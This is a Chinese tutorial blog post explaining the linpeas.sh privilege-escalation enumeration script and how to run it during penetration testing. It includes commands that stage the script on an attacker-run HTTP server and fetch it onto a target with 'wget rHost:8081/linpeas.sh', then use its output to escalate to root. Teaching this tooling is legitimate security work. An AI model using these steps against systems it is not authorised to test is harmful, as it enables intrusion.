linpeas.sh脚本

已于 2024-12-12 10:07:55 修改
阅读量544 收藏 4
点赞数 10
分类专栏: 红队全栈 文章标签: 安全 网络安全 github
于 2024-12-12 08:51:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011587070/article/details/144415384
版权

linpeas.sh(Linux Privilege Escalation Script with Bash)是一个为信息安全研究人员和渗透测试人员设计的bash脚本。它用于在Linux系统中帮助发现权限提升(privilege escalation)的可能性。该脚本会执行一系列的检查,包括但不限于系统配置、软件版本、不安全的文件权限、错误配置的服务等,这些检查可能会揭示出可以利用的安全漏洞,从而允许攻击者或测试者从普通用户权限提升到更高的权限,例如root。

linpeas.sh 是社区中广泛使用的工具之一,它集合了许多常见的提权技术和方法,可以自动化地帮助测试者节省时间,而不是手动执行每一个检查步骤。

以下是linpeas.sh可能执行的一些操作:

  • 检查可用的内核模块和相关的攻击向量。
  • 查找拥有suid或guid权限的文件,这些文件可能被用来获取更高的权限。
  • 检查安装的包和它们的版本,以发现已知的易受攻击的版本。
  • 寻找配置不当的cron jobs或启动服务。
  • 查看环境变量和系统配置文件,寻找潜在的安全漏洞。
  • 等等。

一.使用步骤

 准备

下载
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
开启一个服务让目标下载
python3 -m http.server 8081
目标下载
wget rHost:8081/linpeas.sh

给予执行权限

下载或克隆脚本后,需要给予它执行权限:

chmod +x linpeas.sh

运行脚本

作为普通用户运行脚本,通常不需要root权限,因为它会尝试找到提升权限的方法:

./linpeas.sh

如果你希望将输出重定向到一个文件中,可以使用以下命令:

./linpeas.sh > linpeas_output.txt

分析输出 

脚本运行后,它会提供大量的信息,包括可能的安全问题和权限提升的方法。仔细分析这些输出,查找可以利用的点

尝试提权

根据脚本提供的信息,尝试使用推荐的方法来提升权限。这可能包括利用某些配置错误、使用特定的工具或技术。

对Matrix-Breakout-2-Morpheus靶机进行渗透测试
zll___的博客
03-27 1039
对Matrix-Breakout-2-Morpheus靶机进行渗透测试
靶场(四)---小白心得&&全流程分析
g9999g的博客
03-09 1162
单论整体靶场的难度其实并不大,重点是看你信息收集的能力细不细致,还有就是提权永远要从简单往难试,不要硬钻死牛角尖,dirtycow在别的地方不成功,不代表在这里不行,所以一定要都试试。
Linux 权限提升之术:以 LinPEAS 为刃,破系统之壁
最新发布
vortex5的博客
03-14 460
在渗透测试和权限提升评估中,LinPEAS(Linux Privilege Escalation Awesome Script)是⼀个⽤来搜索类unix主机上可能的提权路径的⾃动化脚本。本文将介绍使用 LinPEAS 的最佳实践方案,并针对不同环境(如无。这种方式的主要优点是快速、高效,并且由于通过数据流直接传输,减少了磁盘痕迹。在渗透测试过程中,根据目标环境的实际情况选择合适的方法,可以更高效地执行 LinPEAS 进行权限提升评估。在受控测试环境中,我们可以使用。在攻击机上,可以使用。
Linpeas的简单使用
Themanager112的博客
01-06 3613
是一个流行的脚本,用于在渗透测试中进行特权升级和系统枚举。要在 Kali Linux 中使用。在没有授权的情况下对系统运行渗透测试工具可能违法。并不是预装的工具,因此你不会在标准安装中找到它。,你需要手动下载和运行它。: 你可以从其 GitHub 仓库下载。请确保在合法和授权的环境中使用。在 Kali Linux 中,
Tre靶场通关过程(linpeas使用+启动项编辑器提权)
tpaer的博客
05-07 2586
通过信息收集获得到了普通用户账号密码,利用PEASS-ng的linpeas脚本进行提权的信息收集再进行提权。
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 750
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
提权信息收集自动化脚本-LinPEAS
04-10
该工具是纯bash脚本,通用性很好,能够收集上述几乎所有的提权信息,足够全面。但运行时间长,效率低,得到的信息虽然全面,但重点不够突出,有较多无用信息,稍显冗杂。 使用方式为: ./linpeas.sh
笔记20-40
2201_75378806的博客
03-27 918
常规烧苗只有80端口,是个登入页面,是CuteNews 2.0.3 ,searchsploit CuteNews 2.0.3(或者谷歌搜索可利用漏洞),直接注册账号后在上传头像处上传一个带shell的.jpg文件,抓包改.php(我看人家直接上传php也可以)监听得权限,一番提权搜索,啥也没有,利用内核提权。(上传linpeas.sh搜索是脏牛,根据searchsploit kernel 3.16.0-30的不行)
vulnhub Mr-Robot: 1
箭雨镜屋
12-17 1924
本文思路: nmap扫描开放端口-->dirb扫描网站目录-->查看robots.txt拿到第一个key,并下载字典文件-->爆破WordPress用户名和密码-->通过WordPress的模板编辑功能获得daemon用户反弹shell-->通过权限设置不当的密码文件获得robot用户的密码,并得到第二个key-->通过nmap提权,并得到第三个key
linpeas.sh脚本下载
01-02
您只需将linpeas.sh脚本下载到您的Linux系统上,然后运行它即可。 当运行linpeas.sh脚本时,它会自动分析系统的配置和文件,查找特权丢失、SUID/SGID文件、可写的配置文件等漏洞。它还检查中间件、服务和进程的版本...
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
qq_62716256的博客
09-14 2078
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
cloud-config-toolbox-ui:dCloud协作工具箱页面,用于管理像Cisco Answers这样的云演示配置
02-24
cloud-config-toolbox-ui dCloud Colud Configuration Web门户UI项目。 它使用Webpack 4在Vue.js 2.6(包括vue-router和vuex)上构建。 发展 用法 yarn以安装依赖项软件包yarn start构建库并使用热重载yarn build:test开始开发环境yarn build:test以构建生产文件并启动快速Web服务器以测试生产文件vue-devtools以启动Vue.js开发人员工具电子应用程序。 您将需要在全球范围内单独安装此工具,但是一旦可用,您就可以使用此命令行来监视Vue应用程序的状态和DOM详细信息。 此脚本仅在开发模式下添加到index.html。 智威汤逊 开发网站上的登录功能将提示您输入JWT,因为它无法重定向您真正的SSO提供程序。 您可以通过访问并登录,然后打开浏览器JavaScrip
网络安全】记一次红队渗透实战项目
kali_Ma的博客
01-30 9242
mcrypt 是php里面重要的加密支持扩展库,主要是用mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。就是用户输入的数据转换为base64编码和解码功能,还有将字符串转换为 8-bit 字符串功能。PHP存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。root权限pip,PIP是Python包或模块的包管理器,包含模块所需的所有文件。没发现新的东西,但是可看到devops的ID为1002是共用的!lang= ,出现这种形式,很可能是sql注入或文件包含。
网络安全】红队渗透项目之Stapler1(下)
HBohan的博客
04-21 4032
声明:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 建议阅读上一篇后再来阅读本文!!! 六、Mysql攻陷服务器 1、mysql INTO OUT文件上传 MySQL中你可以使用SELECT…INTO OUTFILE语句来简单的导出数据到文本文件上。 1)INTO OUT 写入shell.php mysql -u.
vulnhub靶机:driftingblues-5
waitagirl的博客
03-20 1763
vulnhub靶机:driftingblues-5
提权工具推荐(PEASS-ng、linpeas_linux_amd64、winPEASany_ofs)
墨痕诉清风的博客
03-21 1884
在这里,您可以找到适用于Windows、Linux/Unix*和MacOS的权限提升工具。这些工具搜索您可以利用的可能的本地权限提升路径,并用漂亮的颜色打印给您,这样您就可以很容易地识别错误配置。查看book.hacktricks.xyz中的本地Windows权限提升检查表WinPEAS-Windows本地权限提升真棒脚本(C#.exe和.bat)查看book.hacktricks.xyz中的本地Linux权限提升检查表LinPEAS-Linux本地权限提升真棒脚本.sh
PEASS-ng 项目使用教程
gitblog_00648的博客
10-11 411
PEASS-ng 项目使用教程 项目地址:https://gitcode.com/gh_mirrors/pe/PEASS-ng 1. 项目的目录结构及介绍 PEASS-ng 是一个用于权限提升的脚本集合,支持 Windows、Linux/Unix 和 MacOS 系统。项目的目录结构如下: PEASS-ng/ ├── build_lists/ ├── linPEAS/ ├── metasploit...
matrix-breakout-2-morpheus已完成
qaqCL的博客
07-28 327
matrix-breakout-2-morpheus
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值